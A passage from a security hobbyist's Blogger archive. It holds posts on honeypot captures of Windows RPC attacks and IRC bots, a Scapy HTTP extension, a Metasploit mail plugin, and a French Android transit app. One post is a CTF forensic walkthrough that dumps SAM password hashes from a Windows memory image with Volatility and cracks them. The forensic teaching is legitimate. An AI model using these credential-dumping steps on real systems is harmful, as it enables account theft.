</tr>
<tr>
<td>DCOM</td><td>RemoteActivation</td><td>MS03-26</td>
</tr>
<tr>
<td>DSSETUP</td><td>DsRolerUpgradeDownlevelServer</td><td>MS04-11</td>
</tr>
<tr>
<td>ISystemActivator</td><td>RemoteCreateInstance</td><td>MS04-12</td>
</tr>
<tr>
<td>MSMQ</td><td>QMCreateObjectInternal</td><td>MS07-065</td>
</tr>
<tr>
<td>MSMQ</td><td>QMDeleteObject</td><td>MS05-017</td>
</tr>
<tr>
<td>NWWKS</td><td>NwChangePassword</td><td>MS06-66</td>
</tr>
<tr>
<td>NWWKS</td><td>NwOpenEnumNdsSubTrees</td><td>MS06-66</td>
</tr>
<tr>
<td>PNP</td><td>PNP_QueryResConfList</td><td>MS05-39</td>
</tr>
<tr>
<td>SRVSVC</td><td>NetPathCanonicalize</td><td>MS08-67</td>
</tr>
<tr>
<td>SRVSVC</td><td>NetPathCompare</td><td>MS08-67</td>
</tr>
<tr>
<td>WKSSVC</td><td>NetAddAlternateComputerName</td><td>MS03-39</td>
</tr>
<tr>
<td>nddeapi</td><td>NDdeSetTrustedShareW</td><td>MS04-031</td>
</tr>
</tbody></table>
<br />
<br />
<br /></div>
<div>
<b><span class="Apple-style-span" style="font-size: large;">Malware URLs</span></b></div>
<div>
<br /></div>
<div>
<i>select downloads.download_url, downloads.download_md5_hash,connections.local_port from downloads, connections where downloads.connection=connections.connection;</i></div>
<div>
<br /></div>
<div>
All malwares have been downloaded on TFTP servers and are link to connections with port 135. As URLs are pointing to malwares, I won't show them here.</div>
<div>
<br /></div>
<div>
<br />
<br />
<span class="Apple-style-span" style="font-size: large;"><b>Virustotal reports</b></span></div>
<div>
<br /></div>
<div>
<i>select virustotal_permalink from virustotals;</i><br />
<br />
<a class="vt-p" href="http://www.virustotal.com/file-scan/report.html?id=1a934b461b5c40172958415928b23ae6b75bf194ecb1927ce09c30b765f09d92-1312716887">http://www.virustotal.com/file-scan/report.html?id=1a934b461b5c40172958415928b23ae6b75bf194ecb1927ce09c30b765f09d92-1312716887</a><br />
<a class="vt-p" href="http://www.virustotal.com/file-scan/report.html?id=badf757dbbcb192bceb0ac9e2c949dfbe3d2a1022a6017ab3be611053f6412ef-1299403039">http://www.virustotal.com/file-scan/report.html?id=badf757dbbcb192bceb0ac9e2c949dfbe3d2a1022a6017ab3be611053f6412ef-1299403039</a><br />
<a class="vt-p" href="http://www.virustotal.com/file-scan/report.html?id=cdcfa06de82598a06d3eba5259306a5caccfbf0265625ad65de8de2620e17131-1312716944">http://www.virustotal.com/file-scan/report.html?id=cdcfa06de82598a06d3eba5259306a5caccfbf0265625ad65de8de2620e17131-1312716944</a><br />
<a class="vt-p" href="http://www.virustotal.com/file-scan/report.html?id=4f226d64e7083b0cb7e36076edd76520498e95cb24380bbd469b13e46096b7ad-1312716946">http://www.virustotal.com/file-scan/report.html?id=4f226d64e7083b0cb7e36076edd76520498e95cb24380bbd469b13e46096b7ad-1312716946</a><br />
<a class="vt-p" href="http://www.virustotal.com/file-scan/report.html?id=273040d07e3d2c1153967015fa069de7e3086163651babcc07ab321b289d70d5-1314124477">http://www.virustotal.com/file-scan/report.html?id=273040d07e3d2c1153967015fa069de7e3086163651babcc07ab321b289d70d5-1314124477</a><br />
<a class="vt-p" href="http://www.virustotal.com/file-scan/report.html?id=922a7d3c82c4782f9795a82271df3be8628eefa6a0fa104caad7472772f5e43e-1312713825">http://www.virustotal.com/file-scan/report.html?id=922a7d3c82c4782f9795a82271df3be8628eefa6a0fa104caad7472772f5e43e-1312713825</a><br />
<a class="vt-p" href="http://www.virustotal.com/file-scan/report.html?id=ec9b2bf6a6fdb2aa5b699ea897925e2e3b152aecc6db28c47992607871a50c28-1312713850">http://www.virustotal.com/file-scan/report.html?id=ec9b2bf6a6fdb2aa5b699ea897925e2e3b152aecc6db28c47992607871a50c28-1312713850</a><br />
<a class="vt-p" href="http://www.virustotal.com/file-scan/report.html?id=dc64e5eb25f14b17b415a1c73523e0825d6f79a8b0f47194c097028d1dc93003-1310608851">http://www.virustotal.com/file-scan/report.html?id=dc64e5eb25f14b17b415a1c73523e0825d6f79a8b0f47194c097028d1dc93003-1310608851</a><br />
<a class="vt-p" href="http://www.virustotal.com/file-scan/report.html?id=9f932547a0f1050fcc06513b1701d817c201904820b710daa2d8907e19383b6a-1307217666">http://www.virustotal.com/file-scan/report.html?id=9f932547a0f1050fcc06513b1701d817c201904820b710daa2d8907e19383b6a-1307217666</a><br />
<a class="vt-p" href="http://www.virustotal.com/file-scan/report.html?id=878949d20c4c07cbe21e96f24d77e8c3387e8fc65e60250138ab94ee5d3fb561-1312713864">http://www.virustotal.com/file-scan/report.html?id=878949d20c4c07cbe21e96f24d77e8c3387e8fc65e60250138ab94ee5d3fb561-1312713864</a><br />
<a class="vt-p" href="http://www.virustotal.com/file-scan/report.html?id=137d09a12f04cfee5dbd0e98422a127f8ca7bc1d26c118be067251a456afecdc-1314040714">http://www.virustotal.com/file-scan/report.html?id=137d09a12f04cfee5dbd0e98422a127f8ca7bc1d26c118be067251a456afecdc-1314040714</a><br />
<a class="vt-p" href="http://www.virustotal.com/file-scan/report.html?id=83c334585c33b1996697cc0ff5f7b131b065628c2dc6f4c81a0ea9e1a341baf7-1310796380">http://www.virustotal.com/file-scan/report.html?id=83c334585c33b1996697cc0ff5f7b131b065628c2dc6f4c81a0ea9e1a341baf7-1310796380</a><br />
<br />
All these URLs are Virustotal report of malwares capturated by my honeypot. Most of them have been submitted to Virustotal this summer. According reports, they are all IRC bots. As detection rate is high (between 93% and 98%), they are not an important threat for our computer as long as user is not stupid.</div>
</div><div class="blogger-post-footer">Don't hesitate to follow me on Twitter : https://twitter.com/steevebarbeau</div>Steeve BARBEAUhttp://www.blogger.com/profile/13290697188569225316noreply@blogger.com1Rouen49.421694060849241 1.098632812549.091181560849243 0.4669188125 49.752206560849238 1.7303468125tag:blogger.com,1999:blog-6555208034441643895.post-72384658290274974982011-06-23T00:25:00.001+02:002012-01-26T00:13:09.905+01:00HTTP support in Scapy<i>"Scapy is a powerful interactive packet manipulation program. It is able to forge or decode packets of a wide number of protocols, send them on the wire, capture them, match requests and replies, and much more. It can easily handle most classical tasks like scanning, tracerouting, probing, unit tests, attacks or network discovery (it can replace hping, 85% of nmap, arpspoof, arp-sk, arping, tcpdump, tethereal, p0f, etc.)." <a class="vt-p" href="http://www.secdev.org/projects/scapy/">http://www.secdev.org/projects/scapy/</a></i><br />
<div>
<br /></div>
<div>
<a class="vt-p" href="http://www.secdev.org/projects/scapy/doc/index.html">Scapy's documentation</a> is very interesting to learn <a class="vt-p" href="http://www.secdev.org/projects/scapy/doc/usage.html">how to use it</a> and <a class="vt-p" href="http://www.secdev.org/projects/scapy/doc/build_dissect.html">how to add new protocols</a>. To become more familiar with this great tool, I've decided to try to implement one of the most used protocol : HTTP (<a class="vt-p" href="http://tools.ietf.org/html/rfc2616">RFC 2616</a>).</div>
<div>
<blockquote>
steeve-pc:blog steeve$ ./HTTP.py<br />
Welcome to Scapy (2.2.0)<br />
HTTP Scapy extension<br />
>>> test=rdpcap("HTTP.pcap")<br />
>>> test.summary()<br />
Ether / IP / TCP 145.254.160.237:tip2 > 65.208.228.223:http S<br />
Ether / IP / TCP 65.208.228.223:http > 145.254.160.237:tip2 SA<br />
Ether / IP / TCP 145.254.160.237:tip2 > 65.208.228.223:http A<br />
Ether / IP / TCP 145.254.160.237:tip2 > 65.208.228.223:http PA / HTTP / HTTPrequest / Raw<br />
Ether / IP / TCP 65.208.228.223:http > 145.254.160.237:tip2 A<br />
Ether / IP / TCP 65.208.228.223:http > 145.254.160.237:tip2 A / HTTP / HTTPresponse / Raw<br />
Ether / IP / TCP 145.254.160.237:tip2 > 65.208.228.223:http A<br />
Ether / IP / TCP 65.208.228.223:http > 145.254.160.237:tip2 A / HTTP / Raw<br />
Ether / IP / TCP 145.254.160.237:tip2 > 65.208.228.223:http A<br />
Ether / IP / TCP 65.208.228.223:http > 145.254.160.237:tip2 A / HTTP / Raw<br />
Ether / IP / TCP 65.208.228.223:http > 145.254.160.237:tip2 PA / HTTP / Raw<br />
Ether / IP / TCP 145.254.160.237:tip2 > 65.208.228.223:http A<br />
[...]</blockquote>
</div>
<div>
The function summary() shows the content of each packet and here we can see that we have packets with interesting layers : HTTP, HTTPrequest and HTTPresponse. HTTP layer contains all the fields that can be in the 2 other layers like Date or Connection fields. HTTPrequest layer corresponds to HTTP request (GET, POST, TRACE, HEAD ...) and HTTPresponse to "200 OK", "404 Not Found"... webpages.</div>
<div>
<br /></div>
<div>
We can see the content of the paquet containing the HTTPrequest layer :</div>
<div>
<blockquote>
>>> test[3].show()<br />
###[ Ethernet ]###<br />
dst= fe:ff:20:00:01:00<br />
src= 00:00:01:00:00:00<br />
type= 0x800<br />
###[ IP ]###<br />
version= 4L<br />
ihl= 5L<br />
tos= 0x0<br />
len= 519<br />
id= 3909<br />
flags= DF<br />
frag= 0L<br />
ttl= 128<br />
proto= tcp<br />
chksum= 0x9010<br />
src= 145.254.160.237<br />
dst= 65.208.228.223<br />
\options\<br />
###[ TCP ]###<br />
sport= tip2<br />
dport= http<br />
seq= 951057940<br />
ack= 290218380<br />
dataofs= 5L<br />
reserved= 0L<br />
flags= PA<br />
window= 9660<br />
chksum= 0xa958<br />
urgptr= 0<br />
options= []<br />
###[ HTTP ]###<br />
CacheControl= None<br />
Connection= 'Connection: keep-alive\r\n'<br />
Date= None<br />
Pragma= None<br />
Trailer= None<br />
TransferEncoding= None<br />
Upgrade= None<br />
Via= None<br />
Warning= None<br />
KeepAlive= 'Keep-Alive: 300\r\n'<br />
Allow= None<br />
ContentEncoding= None<br />
ContentLanguage= None<br />
ContentLength= None<br />
ContentLocation= None<br />
ContentMD5= None<br />
ContentRange= None<br />
ContentType= None<br />
Expires= None<br />
LastModified= None<br />
###[ HTTP Request ]###<br />
Method= 'GET /download.html HTTP/1.1\r\n'<br />
Host= 'Host: www.ethereal.com\r\n'<br />
UserAgent= 'User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.6) Gecko/20040113\r\n'<br />
Accept= 'Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1\r\n'<br />
AcceptLanguage= 'Accept-Language: en-us,en;q=0.5\r\n'<br />
AcceptEncoding= 'Accept-Encoding: gzip,deflate\r\n'<br />
AcceptCharset= 'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n'<br />
Referer= 'Referer: http://www.ethereal.com/development.html\r\n'<br />
Authorization= None<br />
Expect= None<br />
From= None<br />
IfMatch= None<br />
IfModifiedSince= None<br />
IfNoneMatch= None<br />
IfRange= None<br />
IfUnmodifiedSince= None<br />
MaxForwards= None<br />
ProxyAuthorization= None<br />
Range= None<br />
TE= None<br />
###[ Raw ]###<br />
load= '\r\n'</blockquote>
</div>
<div>
<br />
Now we can easily manipulate HTTP packets with Scapy. Here, I will filter packets with HTTPrequest or HTTPresponse layer and then print some fields :<br />
<blockquote>
<br />
>>> http=test.filter(lambda(s): HTTPrequest in s or HTTPresponse in s)<br />
>>> http.summary()<br />
Ether / IP / TCP 145.254.160.237:tip2 > 65.208.228.223:http PA / HTTP / HTTPrequest / Raw<br />
Ether / IP / TCP 65.208.228.223:http > 145.254.160.237:tip2 A / HTTP / HTTPresponse / Raw<br />
Ether / IP / TCP 145.254.160.237:3371 > 216.239.59.99:http PA / HTTP / HTTPrequest / Raw<br />
Ether / IP / TCP 216.239.59.99:http > 145.254.160.237:3371 PA / HTTP / HTTPresponse / Raw<br />
Ether / IP / TCP 216.239.59.99:http > 145.254.160.237:3371 PA / HTTP / HTTPresponse / Raw<br />
>>> for p in http.filter(lambda(s): HTTPrequest in s):<br />
... print p.Method, p.Host<br />
...<br />
GET /download.html HTTP/1.1<br />
Host: www.ethereal.com<br />
GET /pagead/ads?client=ca-pub-2309191948673629&random=1084443430285&lmt=1082467020&format=468x60_as&output=html&url=http%3A%2F%2Fwww.ethereal.com%2Fdownload.html&color_bg=FFFFFF&color_text=333333&color_link=000000&color_url=666633&color_border=666633 HTTP/1.1<br />
Host: pagead2.googlesyndication.com<br />
>>> for p in http.filter(lambda(s): HTTPresponse in s):<br />
... print p.StatusLine, p.Server<br />
...<br />
HTTP/1.1 200 OK<br />
Server: Apache<br />
HTTP/1.1 200 OK<br />
Server: CAFE/1.0<br />
HTTP/1.1 200 OK<br />
Server: CAFE/1.0<br />
>>> </blockquote>
My script can be downloaded <a class="vt-p" href="https://sites.google.com/site/steevebarbeau/home/HTTP.py-1?attredirects=0&d=1" target="_blank">here</a>. Don't hesitate to give me your opinion or to improve my script ;) </div><div class="blogger-post-footer">Don't hesitate to follow me on Twitter : https://twitter.com/steevebarbeau</div>Steeve BARBEAUhttp://www.blogger.com/profile/13290697188569225316noreply@blogger.com5tag:blogger.com,1999:blog-6555208034441643895.post-45741424212120235702011-03-19T13:12:00.000+01:002011-03-19T13:12:50.871+01:00Get password from memory dumpTo explain how we can get password from memory dump, I will use forensic challenge #2 from <a class="vt-p" href="http://wargame.nuitduhack.com/">"Nuit du Hack 2010"</a> as example. <br />
Aim : extract Administrator password from the Windows XP memory dump<br />
<br />
We will use a great tool to extract this password which is : <a class="vt-p" href="http://code.google.com/p/volatility/">Volatility</a>. Volatility has a plugin called "hashdump" to extract password hashes. So we have to use it, but before we have to locate virtual address of SYSTEM and SAM hive.<br />
<br />
Find physical adresses of registry hives (hivescan plugin) :<br />
<br />
user@ubuntu-vm:~/Desktop/volatility$ python volatility.py -f ../xp_forensics.vmem --profile=WinXPSP3x86 hivescan<br />
Volatile Systems Volatility Framework 1.4_rc1<br />
Offset (hex) <br />
44666888 0x02a99008<br />
44694368 0x02a9fb60<br />
[...]<br />
380343784 0x16ab95e8<br />
424820744 0x19524008<br />
<br />
Then locate virtual addresses (hivelist plugin) :<br />
<br />
user@ubuntu-vm:~/Desktop/volatility$ python volatility.py -f ../xp_forensics.vmem --profile=WinXPSP3x86 hivelist<br />
Volatile Systems Volatility Framework 1.4_rc1<br />
Virtual Physical Name<br />
0xe1cf9008 0x19524008 \??\C:\Documents and Settings\mr_esclave\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat<br />
[...]<br />
0xe15fdb60 0x0688ab60 \Device\HarddiskVolume1\WINDOWS\system32\config\software<br />
0xe15ebb60 0x06708b60 \Device\HarddiskVolume1\WINDOWS\system32\config\default<br />
0xe15fd008 0x0688a008 \Device\HarddiskVolume1\WINDOWS\system32\config\SECURITY<br />
<b>0xe15f2658</b> 0x066cf658 \Device\HarddiskVolume1\WINDOWS\system32\config\SAM<br />
0xe12eb288 0x02d58288 [no name]<br />
<b>0xe1035b60</b> 0x02a9fb60 \Device\HarddiskVolume1\WINDOWS\system32\config\system<br />
0xe102e008 0x02a99008 [no name]<br />
0x8066e904 0x0066e904 [no name]<br />
<br />
Now we have SYSTEM and SAM virtual addresses, so we can run hashdump plugin :<br />
<br />
user@ubuntu-vm:~/Desktop/volatility$ python volatility.py -f ../xp_forensics.vmem --profile=WinXPSP3x86 hashdump -y <b>0xe1035b60</b> -s <b>0xe15f2658</b><br />
Volatile Systems Volatility Framework 1.4_rc1<br />
Administrateur:500:a94c6377a507e293d87f0f06a65161cd:ca5cf9cfc07ec43a78d00bc936242594:::<br />
<br />
Last step is to use ophcrack with rainbow tables to crack this password :<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a class="vt-p" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbAJJYLvvGG6HMI5-CRFEGneutPOOzNRnnQaQ_HVGw7VzZgtgWImVoG6czvyDeeqrBYwuj4WT2ThsOv7QQRo-7A_TxOz0G-asAlhhV5IDHpGUoJqs9MPzgVDmwZVbGtknvbUopvUhl59ui/s1600/Screen+shot+2011-03-18+at+9.09.37+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="261" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbAJJYLvvGG6HMI5-CRFEGneutPOOzNRnnQaQ_HVGw7VzZgtgWImVoG6czvyDeeqrBYwuj4WT2ThsOv7QQRo-7A_TxOz0G-asAlhhV5IDHpGUoJqs9MPzgVDmwZVbGtknvbUopvUhl59ui/s320/Screen+shot+2011-03-18+at+9.09.37+PM.png" width="320" /></a></div><br />
We have easily got Administrator's password which is "cuirmoustache".<br />
<br />
<br />
Nuit du Hack challenges : <a class="vt-p" href="http://wargame.nuitduhack.com/">http://wargame.nuitduhack.com/</a><br />
Volatility plugin list : <a class="vt-p" href="http://code.google.com/p/volatility/wiki/CommandReference">http://code.google.com/p/volatility/wiki/CommandReference</a><div class="blogger-post-footer">Don't hesitate to follow me on Twitter : https://twitter.com/steevebarbeau</div>Steeve BARBEAUhttp://www.blogger.com/profile/13290697188569225316noreply@blogger.com0tag:blogger.com,1999:blog-6555208034441643895.post-64866357091919651292011-02-27T15:13:00.002+01:002011-02-27T15:23:59.094+01:00Use Metasploit as email clientThis metasploit plugin is my first piece of Ruby code and is a very basic email client. With this plugin you can send emails (by smtp), and receive unread mails by imap. <a class="vt-p" href="https://sites.google.com/site/steevebarbeau/home/mail_client.rb?attredirects=0&d=1">Download my metasploit plugin</a>.<br />
<br />
<b><span class="Apple-style-span" style="font-size: large;">Send mails :</span></b><br />
<br />
msf > load mail_client<br />
[*] Mail Client plugin loaded.<br />
[*] Successfully loaded plugin: MailClient<br />
msf > send_mail<br />
Enter your smtp password :<br />
Use ';' for multiple recipients<br />
To : email@mail.com<br />
Subject : Test metasploit plugin<br />
Message :<br />
Is my plugin working ?? We will see ...<br />
<br />
Send ...<br />
msf ><br />
<br />
<br />
<b><span class="Apple-style-span" style="font-size: large;">Get mails :</span></b><br />
<br />
msf > get_mails<br />
<br />
0. Sun, 27 Feb 2011 00:11:58 +0000 - Test metasploit plugin<br />
? read 0<br />
Is my plugin working ?? We will see ...<br />
<br />
Sent from Metasploit<br />
----------<br />
? help<br />
read X<br />
list<br />
help<br />
exit<br />
?<br />
<br />
This plugin uses basic Net::IMAP from Ruby, so authentication is limited to "LOGIN" and "CRAM-MD5" authentication mechanisms. I have not added <a class="vt-p" href="http://code.google.com/apis/gmail/oauth/">OAUTH</a> used by Gmail or others kinds of "high level" authentication methods.<div class="blogger-post-footer">Don't hesitate to follow me on Twitter : https://twitter.com/steevebarbeau</div>Steeve BARBEAUhttp://www.blogger.com/profile/13290697188569225316noreply@blogger.com0tag:blogger.com,1999:blog-6555208034441643895.post-85837331037313391772010-10-06T00:10:00.004+02:002011-02-27T15:16:18.666+01:00Ma première application Android<div style="text-align: justify;">Suite à la rédaction de mon précédent article, j'ai voulu m'essayer au développement sous l'OS mobile de Google : Android. Cet article a donc pour but de partager ma petite application avec les rouennais et rouennaises pouvant en avoir besoin.</div><br />
Lien de téléchargement : <a class="vt-p" href="http://code.google.com/p/rouentransport/downloads/detail?name=TCAR.apk&can=2&q=">http://code.google.com/p/rouentransport/downloads/detail?name=TCAR.apk&can=2&q=</a><br />
<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a class="vt-p" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVH-8ulTzikAG0s7w8Kws-SdJGhnyON5LlKSisA8VCwj8CUdtkgKFfSkKJuORQ5OpQbJgrb7jl5-XP_Y5l0qJfoUidpXonuS4arj-GyR7webPoElvxL0H6R2PLBoLLdv0Q9xGqZDZN1G1S/s1600/device.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVH-8ulTzikAG0s7w8Kws-SdJGhnyON5LlKSisA8VCwj8CUdtkgKFfSkKJuORQ5OpQbJgrb7jl5-XP_Y5l0qJfoUidpXonuS4arj-GyR7webPoElvxL0H6R2PLBoLLdv0Q9xGqZDZN1G1S/s320/device.png" width="111" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Application</td></tr>
</tbody></table><span class="Apple-style-span"><b><span class="Apple-style-span" style="font-size: x-large;">L'application et le widget</span></b></span><br />
<br />
<div style="text-align: justify;">Tout d'abord je souhaite préciser plusieurs choses concernant mon projet :</div><div style="text-align: justify;"> - le design de l'application n'était pas ma priorité</div><div style="text-align: justify;"> - la fiabilité des horaires affichés par l'application et le widget ne dépend pas de moi mais de la TCAR (société des Transports en Commun de l'Agglomération de Rouen). De plus les horaires de certaines lignes sont "en temps réel" alors que d'autres sont fixes et ne tiennent donc pas compte des retards possibles.</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">L'application affiche l'heure de passage prévue suivant la direction (terminus) que vous avez choisi ainsi que à la station à laquelle vous vous trouvez.</div><div style="text-align: justify;"><br />
<br />
</div><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a class="vt-p" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi38N8cd-i_M4Ca39ydgUdFl-bu6TGChBYZ9rW3n-5-8G5x8hP3rmOjgYL-5xlTiuMMAOE5nWsDuvLIFwq3CMcENKTs6hKX5SnSeMFVKjwO9TBWz2Afod4jOmfGwXGeZE679H8At5pzfpAi/s1600/device2.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi38N8cd-i_M4Ca39ydgUdFl-bu6TGChBYZ9rW3n-5-8G5x8hP3rmOjgYL-5xlTiuMMAOE5nWsDuvLIFwq3CMcENKTs6hKX5SnSeMFVKjwO9TBWz2Afod4jOmfGwXGeZE679H8At5pzfpAi/s200/device2.png" width="111" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Configuration du widget</td></tr>
</tbody></table><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a class="vt-p" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDn0ObyggHC8W4L9yEZaUY39cDrV2Yrh7ETvuCjBjrQi1XQOuKDuN1XCXzM00_t3RtPekCnByadZy0HjleTMTfsIxwBiYmPJjV1fbd1r8kOb47_1pp2f_fDp31lKgR1AcGmUNVZhmuc4dV/s1600/device3.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDn0ObyggHC8W4L9yEZaUY39cDrV2Yrh7ETvuCjBjrQi1XQOuKDuN1XCXzM00_t3RtPekCnByadZy0HjleTMTfsIxwBiYmPJjV1fbd1r8kOb47_1pp2f_fDp31lKgR1AcGmUNVZhmuc4dV/s200/device3.png" width="111" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Widget</td></tr>
</tbody></table><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">Le widget affiche les mêmes informations que l'application avec la possibilité en plus de le rafraichir automatiquement toutes les X minutes.</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">PS : les tests ont été réalisés sur un Motorola Milestone uniquement, il est donc possible que des bugs existent sur d'autres modèles.</div><br />
<br />
<br />
<b><span class="Apple-style-span"><span class="Apple-style-span" style="font-size: x-large;">L'installation</span></span></b><br />
<div style="text-align: justify;"><br />
</div><div style="text-align: justify;">Puisque mon application n'est pas disponible sur l'Android Market, il faudra pour l'installer, autoriser l'installation d'applications de sources inconnues (Préférences>Applications>Sources inconnues). </div><div style="text-align: justify;">Ensuite pour l'installer, vous pouvez utiliser par exemple AppMonster (disponible sur le Market). Cette application vous permettra d'installer une application à partir du fichier .apk. Pour celà, dans le menu d'AppMonster, faites Install>Whole SD puis sélectionner TCAR et cliquer sur Install.</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><br />
<br />
</div><div style="text-align: justify;">Si mon application vous a plu, si vous souhaitez faire des critiques, si vous trouvez des bugs ... n'hésitez pas à me laisser un commentaire.</div><div class="blogger-post-footer">Don't hesitate to follow me on Twitter : https://twitter.com/steevebarbeau</div>Steeve BARBEAUhttp://www.blogger.com/profile/13290697188569225316noreply@blogger.com0tag:blogger.com,1999:blog-6555208034441643895.post-88847253848451841562010-09-17T23:53:00.004+02:002010-09-19T16:34:47.790+02:00Profiter du code d'un widget iGoogle<div style="text-align: justify;">Ayant récemment déménagé à Rouen pour mes études, un de mes premiers besoin était de pouvoir consulter les horaires des transports en commun de la ville. Malheureusement, je n'ai pas trouvé d'application remplissant ce rôle pour mon téléphone sous Android. La seule chose que j'ai trouvé, c'est un <a class="vt-p" href="http://www.google.com/ig/adde?source=atgs&moduleurl=www.tcar.fr/gadget/gadget.xml">lien</a> vers un widget iGoogle. Ce widget permet de connaître les différentes perturbations du réseau de transport ainsi que les horaires des prochains métros, tramways, bus... J'ai donc observé son fonctionnement pour pouvoir obtenir ce que je recherche, c'est-à-dire les horaires des transports.</div><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a class="vt-p" href="http://www.tcar.fr/gadget/img/tcar_screenshot_horaire.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" src="http://www.tcar.fr/gadget/img/tcar_screenshot_horaire.png" /></a></div><b><span class="Apple-style-span" style="font-size: x-large;">1 - Analyse du widget</span></b><br />
<br />
<div style="text-align: justify;">Le widget se situe à l'adresse suivante (http://www.tcar.fr/gadget/gadget.xml). Ce fichier contient un certain nombre de choses dont les adresses d'images, d'une feuille de style, d'un fichier javascript ... Ce dernier est d'ailleurs l'élément le plus important du widget, car c'est au sein de ce fichier que l'on trouve toute les fonctions permettant au widget d'être interactif et de renvoyer des informations à l'utilisateur.</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">Les fonctions intéressantes du fichier javascript (<i>http://www.</i><i>tcar</i><i>.</i><i>fr</i><i>/gadget/_</i><i>js</i><i>/</i><i>widgetEngine</i><i>.</i><i>js</i>) sont les suivantes :</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">- getLines() retourne des informations (id de la ligne, numéro de ligne, type, pictogramme) sur chaque ligne du réseau (métro, THEOR, bus, taxi ...)</div><i>www.</i><i>tcar</i><i>.</i><i>fr</i><i>/gadget/</i><i>getAllLinesWithType</i><i>.</i><i>asp</i><br />
<div><br />
</div><div><div style="text-align: justify;">- getDirections() retourne le numéro de ligne, les noms des terminus, et la direction suivant le terminus</div></div><div style="text-align: justify;"><i>www.</i><i>tcar</i><i>.</i><i>fr</i><i>/</i><i>WebServices</i><i>/</i><i>xgoatService</i><i>/</i><i>xLine</i><i>/</i><i>getDirections</i><i>.</i><i>asp</i><i>?</i><i>uId</i><i>=TCAR01&</i><i>ligID</i><i>=6 </i>(exemple pour la ligne de métro)</div><div><br />
</div><div>- getStops() retourne tous les arrêts d'une ligne</div><div><div><i>www.</i><i>tcar</i><i>.</i><i>fr</i><i>/</i><i>WebServices</i><i>/</i><i>xgoatService</i><i>/</i><i>xLine</i><i>/</i><i>getLineStops</i><i>.</i><i>asp</i><i>?</i><i>uId</i><i>=TCAR01&</i><i>ligID</i><i>=6&</i><i>ligSens</i><i>=1</i> (exemple pour la ligne de métro avec en terminus l'arrêt Technopôle)</div></div><div><br />
</div><div><div style="text-align: justify;">- getLineCode() retourne plusieurs informations dont le code de la ligne qui nous sera utile pour récupérer ensuite les horaires</div></div><div><div><i>www.</i><i>tcar</i><i>.</i><i>fr</i><i>/</i><i>WebServices</i><i>/</i><i>xgoatService</i><i>/</i><i>xLine</i><i>/</i><i>getLineInfos</i><i>.</i><i>asp</i><i>?</i><i>uId</i><i>=TCAR01&</i><i>ligID</i><i>=6</i></div></div><div><br />
</div><div><div style="text-align: justify;">- callbackLineCode() permet de sélectionner les "identifiants transporteurs" de la ligne à partir du code retourné par getLineCode(). Cette fonction récupère seulement les deux derniers chiffres du code de la ligne.</div><br />
<div style="text-align: justify;">- updateScheduleData() retourne les horaires de tous les métros, bus ... passant après l'heure actuelle (jusqu'à la fin de la journée). Suivant la ligne, les horaires peuvent être actualisé en tant réel ou non.</div><i>www.</i><i>tcar</i><i>.</i><i>fr</i><i>/</i><i>SiriSoapClient</i><i>/</i><i>getStopTimetable</i><i>.</i><i>aspx</i><i>?</i><i>uId</i><i>=</i><i>INEO</i><i>:</i><i>Operator</i><i>:</i><i>Cityway</i><i>:</i><i>LOC</i><i>&</i><i>ligno</i><i>=90&</i><i>ptano</i><i>=10126&sens=1</i> (en temps réel)<br />
<i>www.</i><i>tcar</i><i>.</i><i>fr</i><i>/</i><i>WebServices</i><i>/</i><i>xgoatService</i><i>/</i><i>xHour</i><i>/</i><i>getLineStopNextHours</i><i>.</i><i>asp</i><i> </i><br />
<br />
</div><div><br />
<b><span class="Apple-style-span" style="font-size: x-large;">2 - Script python</span></b><br />
<br />
</div><div><div style="text-align: justify;">J'ai fait un petit script en python afin de tester les éléments de la partie précédente. Le script n'est pas du tout flexible car il récupère l'horaire du prochain métro en direction du sud de Rouen et passant à l'arrêt le plus proche de chez moi. Lorsque le script à trouvé l'horaire du prochain métro, la synthèse vocale annonce l'horaire et la destination de celui-ci (fonctionnel sous Mac grâce à la commande "say").<br />
<br />
</div></div><div><iframe src="http://pastebin.com/embed_iframe.php?i=fBEqB1T6" style="border: none; height: 500px; width: 100%;"></iframe><br />
<br />
